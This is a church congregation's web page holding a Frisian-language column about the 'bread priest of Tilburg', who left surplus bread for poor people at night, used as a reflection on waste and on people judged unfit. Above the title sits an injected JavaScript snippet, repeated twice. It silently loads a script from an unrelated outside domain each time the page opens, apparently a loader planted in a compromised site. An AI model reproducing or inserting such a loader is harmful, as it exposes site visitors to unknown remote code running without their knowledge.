;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “Niet alle aardbeien gaan naar de veiling” - PKN Damwâld

“Niet alle aardbeien gaan naar de veiling”

Gepubliceerd op: zaterdag 9 december 2023

Boppesteande is in útdrukking fan Gerrit Poels, de “broodpater van Tilburg”. Hast 30 jier lang gie dizze man alle nachten(!!) op paad yn Tilburg om minsken dy’t yn earmoed libben, bôle te bringen wat oerstallich wie by de bakker en de supers. Dizze pater wist, dat in soad minsken dy’t yn earmoed libje, harren dérfoar skamje! Krekt dêrom gie de man nachts op paad, hong de tas mei bôle oan de doar, en fietste stil fierder……..! Alle nachten 30 kilometer fietse om syn “klanten” bôle te bringen wêr’t soms wol wat op oan te merken wie, mar nog likegoed te iten.
Alles wat op’e veiling oanbean wurdt, mat oan hiel wat easken foldwaan oars wurdt it ôfkart; kleur, maat, en smaak mat goed wêze, oars bliuwt it oer, want sis no sels,wa wol no in rjochte banaan of komkommer ha……..! De pater seach wat wy allegearre oan iten fuortsmite of steanlitte en wie alle nachten op paad om minsken dy’t net sa “kieskeurig” bin, te helpen.
Is’t mei minsken yn ús deistich libben net krektsa? kleur, ôfkomst, ynkommen, politieke of tsjerklike kleur, dik of just net, baan mei oansjen of krekt net, neffens de wetten fan hjoed-de-dei bin wy ek net allegear geskikt foar “de veiling”, dus ek twadde soart en ûngeskikt…., of nog in twadde kâns…

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns